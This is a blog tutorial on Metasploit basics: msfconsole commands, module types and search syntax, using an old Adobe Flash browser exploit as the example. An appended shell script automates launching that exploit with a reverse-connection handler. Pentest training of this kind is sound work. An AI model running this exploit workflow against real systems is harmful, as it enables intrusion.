Tuesday 19 March 2019

Metasploit Basics, Part 1




I. Introduction

Metasploit is the world's leading exploitation/hacker framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.

What is Metasploit?

Metasploit is a standardized framework for offensive security and penetration testing. Before Metasploit, exploits and shellcode were written by many different developers, in many different languages, for many different systems. The pentester had to trust that the developer had not laced the code with something malicious, and had to work out how each developer intended the exploit, shellcode or tool to be used. With Metasploit, the pentester has a standardized framework in which all the tools work similarly and are written in the same language (Ruby), which makes things much simpler and easier.

Originally developed by HD Moore as an open-source project, it is now owned by the security company Rapid7 (Rapid7 also owns the vulnerability scanner Nexpose). Rapid7 has since developed a Pro version of Metasploit with a few more "bells and whistles". Fortunately, the open-source community edition, the Metasploit Framework, is still available to the rest of us who don't have tens of thousands of dollars to spend on the Pro version (if you are a professional pentester, the efficiency and time savings of the Pro version can make it a good investment).


Metasploit Interfaces
Metasploit has had multiple interfaces, including:

    (1) msfconsole - an interactive command-line-like interface
    (2) msfcli - a literal Linux command line interface (removed from the framework in 2015; msfconsole -x "commands" and resource scripts cover the same use)
    (3) Armitage - a GUI-based third-party application
    (4) msfweb - a browser-based interface (no longer shipped with the framework)

Undoubtedly, the most common way to use Metasploit is through Metasploit's own interactive shell, msfconsole. In this series on Metasploit, we will largely be using msfconsole, but I will show you how to use the others in later tutorials.

In recent years, Metasploit has integrated additional tools to make it more than just an exploitation framework. Tools such as Nmap, Nessus and Nexpose can be driven from within Metasploit (for example db_nmap) or have their results imported into it, so that the entire process, from port scanning through vulnerability scanning, exploitation and post-exploitation, can be done from one tool. In addition, Metasploit now uses a PostgreSQL database to store the data collected from your scans and exploits (hosts, services, credentials, loot and sessions).

II. Getting Started

Before we start Metasploit, we should start the PostgreSQL database. Metasploit will work without PostgreSQL, but the database enables Metasploit to run faster module searches and store the information you collect while scanning and exploiting.

Start the PostgreSQL database before starting Metasploit by typing (the service name is lowercase):

kali > service postgresql start

On a fresh install, also create the Metasploit database and its user once with msfdb init; it is harmless to run again. Once the database has been started, you can start the Metasploit Framework console by typing:

kali > msfconsole

Inside the console, db_status tells you whether Metasploit actually connected to PostgreSQL; if it reports no connection, the database was not started or msfdb init has not been run.




As Metasploit loads everything into RAM, it takes a while, so be patient. Eventually you should get a splash banner followed by the msf > prompt.

Don't worry if the banner doesn't look exactly the same as mine, as Metasploit rotates the opening splash images. As long as you have the msf > prompt, you are in the right place.
If you are more GUI oriented, you can instead go to Applications --> Exploitation Tools --> metasploit framework, which starts the same console.


III. Metasploit Keywords
Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.

Metasploit has six (6) classic types of modules (Metasploit 5, released in 2019, adds a seventh, evasion):

   (1) exploits
   (2) payloads
   (3) auxiliary
   (4) nops
   (5) post
   (6) encoders

A word about terminology before we start. In Metasploit terminology, an exploit is a module that takes advantage of a vulnerability in a system or application. It usually attempts to place a payload on the target system. This payload can be a simple command shell or the all-powerful Meterpreter. Other tools use different names for the same idea, such as implant or agent; note that the payload is the code that runs on the target, while the listener (handler) is the attacker-side component that waits for the payload to connect back. You can read more about the different types of payloads in Metasploit Basics, Part 3: Payloads.

Let's take a look at some of those keyword commands. We can get a list of commands by entering help at the metasploit prompt.
msf >  help







Note that we can access this help menu with the  "?" as well as "help".
msf > use

The "use" command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would enter;

msf > use exploit/windows/browser/adobe_flash_avm2


As you can see above, when Metasploit successfully loads the module, it responds with the type of module (exploit) and the abbreviated module name in red.
msf > show

After you load a module, the show command can be very useful to gather more information on the module. The three "show" commands I use most often are "show options", "show payloads" and "show targets". Let's take a look at "show payloads" first.

msf > show payloads


This command, when used after selecting your exploit, will show you all the payloads that are compatible with this exploit. If you run this command before selecting an exploit, it will show you ALL payloads, a VERY long list.
  
As you see in the screenshot above, the show payloads command listed all the payloads that will work with this exploit.
  
 msf > show options




This command is also very useful in running an exploit. It displays all of the options of the module, including such things as IP addresses, URI path, the port, etc. The Required column tells you which of them must be set before the module will run; the others have usable defaults.
    

 msf > show targets 



A less commonly used command is "show targets". Each exploit has a list of the targets it will work against. By using the "show targets" command, we can get a list of them. In this case, targeting is automatic, but some exploits have as many as 100 different targets and success will often depend upon selecting the correct one (set TARGET followed by its number). These targets can be defined by the operating system, service pack and language, among other things.
msf > info






The info command is simple. When you type it after you have selected a module, it shows you key information about the module, including the options that need to be set, the amount of payload space (more about this in the payloads section), the available targets, the references (such as CVE numbers) and a description of the module. I always run it after selecting my exploit.

msf > search

As a newcomer to Metasploit, the "search" command might be the most useful. When Metasploit was small and new, it was relatively easy to find the module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic, and the search function has become a time- and life-saver.

Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.

To be more specific in your search, you can use the following keywords:

        platform - the operating system that the module is built for
        type - the type of module: exploit, auxiliary, post, payload, encoder or nop
        name - if you know the name of the module, you can search by its name
        cve / edb - search by CVE number or Exploit-DB ID
        author - search by the module author's name

The syntax for using search is the keyword followed by a colon and then a value such as;

msf > search type:exploit
  
Keywords can be combined, and any bare word is matched against the module name and description. For instance, if you were looking for an exploit (type) for Windows (platform) for Adobe Flash, we could type:
msf > search type:exploit platform:windows flash



As you can see above, Metasploit searched its database for exploit modules for the Windows platform whose name or description included the keyword "flash".

msf > set

This command is used to set options within the module you selected. For instance, if we look above at the output of show options, we can see several options such as URIPATH, SRVHOST and SRVPORT. We can set any of these with the set command, for example:

msf > set SRVPORT 80

This changes the default SRVPORT (the port the module's web server listens on) from 8080 to 80. Option names are case-insensitive, but the command itself must be lowercase.
     
msf > unset

This command, as you might expect, unsets the option that was previously set. Such as;

 msf > unset SRVPORT


As you can see, we first set the SRVPORT variable to 80 and then unset it. It then reverted back to the default value of 8080 that we can see when we typed show options again.

msf > exploit



Once we have loaded our exploit and set all the necessary options, the final action is "exploit" (run does the same thing). For a server-side exploit this sends the exploit to the target system and, if successful, delivers the payload and opens a session. For a client-side exploit like this one, it instead sets up a malicious web server and waits for a victim's browser to visit it.

As you can see in this screenshot, the exploit starts and is running as a background job (exploit -j does this explicitly) with a reverse handler on port 4444. It then started a web server on host 0.0.0.0 on port 80 with a randomized URL (F5pmyl9gCHVGw90). We could have chosen a specific URL and set it by changing the URIPATH variable with the set command. Nothing happens until a vulnerable browser requests that URL; you can check for incoming sessions with the sessions command.
msf > back


We can use the back command to take us "back" one step in our process. So, for instance, if we decided that we did not want to use the adobe_flash_avm2 exploit, we could type "back" and it would unload the exploit and return us to the plain msf > prompt.

msf > exit


The exit command, as you would expect, exits msfconsole and returns us to the BASH command shell.

Notice that in this case it also stops the web server we created in this exploit and kills any running jobs before returning us to the Kali command prompt. If you want to keep the handler running, don't exit; background the session and keep working in the console instead.


 

In many exploits, you will see the following options (variables):

    RHOST - the remote host or target IP (newer versions of Metasploit use RHOSTS, which accepts a single IP, a range or a CIDR block)
    LHOST - the local host or attacker IP (the address the payload connects back to)
    RPORT - the remote port or target port
    LPORT - the local port or attacker port (the port the handler listens on)

These can all be set by using the set command followed by the variable name (RHOST, for instance) and then the value.

msf > set RHOST 75.75.75.75
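The whole sequence from this section (start PostgreSQL, check the database, use the module, set SRVPORT/LHOST/LPORT/URIPATH, run it as a background job) can be replayed without typing it interactively. The script below is an added example, not code from the original post or from the Metasploit project: it writes a msfconsole resource script (.rc), validates the ports first, and runs it with msfconsole -q -r when msfconsole is installed. It assumes a Kali-style service command run as root, the module path and option names shown above, and the attacker address 192.168.1.100 and output path are made-up values to be replaced.

```shell
#!/bin/sh
# Added example: drive the msfconsole workflow from this tutorial with a
# resource script. Not part of the original post or of Metasploit itself.
set -eu

# Accept only a decimal integer in 1..65535.
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Write a resource script that replays the commands from the walkthrough.
# Arguments: module path, SRVPORT, LHOST, LPORT, URIPATH ("" = random), output file.
write_rc() {
  module="$1"; srvport="$2"; lhost="$3"; lport="$4"; uripath="$5"; out="$6"
  valid_port "$srvport" || { echo "bad SRVPORT: $srvport" >&2; return 1; }
  valid_port "$lport"   || { echo "bad LPORT: $lport" >&2; return 1; }
  {
    echo "db_status"                 # confirm the PostgreSQL connection first
    echo "use $module"
    echo "set SRVPORT $srvport"      # port the malicious web server listens on
    echo "set LHOST $lhost"          # address the payload connects back to
    echo "set LPORT $lport"          # port the reverse handler listens on
    if [ -n "$uripath" ]; then echo "set URIPATH $uripath"; fi
    echo "show options"
    echo "exploit -j"                # run as a background job, keep the prompt
  } > "$out"
}

# Start PostgreSQL (lowercase service name) and create the msf database if
# this is the first run; both commands are harmless when already done.
start_db() {
  service postgresql start
  msfdb init
}

# Run a resource script in quiet mode and stay at the msf > prompt afterwards.
run_rc() {
  msfconsole -q -r "$1"
}

# Non-interactive search, the same syntax as at the msf > prompt,
# e.g. msf_search type:exploit platform:windows flash
msf_search() {
  msfconsole -q -x "search $*; exit"
}

main() {
  rc="${TMPDIR:-/tmp}/flash_avm2_$$.rc"        # hypothetical output path
  write_rc exploit/windows/browser/adobe_flash_avm2 80 192.168.1.100 4444 "" "$rc"
  cat "$rc"                                    # show what will be replayed
  if command -v msfconsole >/dev/null 2>&1; then
    start_db
    run_rc "$rc"
  else
    echo "msfconsole not found; resource script written to $rc" >&2
  fi
}

main "$@"
```

Resource scripts are plain text, one console command per line, so the same file documents exactly what was run during an engagement and can be checked into your notes. The validation matters because a typo such as SRVPORT 800000 is otherwise only discovered when the module fails to bind.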

Although this is far from an exhaustive list of Metasploit commands, with just these commands you should be able to execute most of the functions in Metasploit. When you need another command in this course, I will take a few minutes to introduce it, but these are all you will likely need for now.

You can continue this series by going to Metasploit Basics, Part 2 as we explore the most powerful open-source exploitation framework until you become a Metasploit Expert!
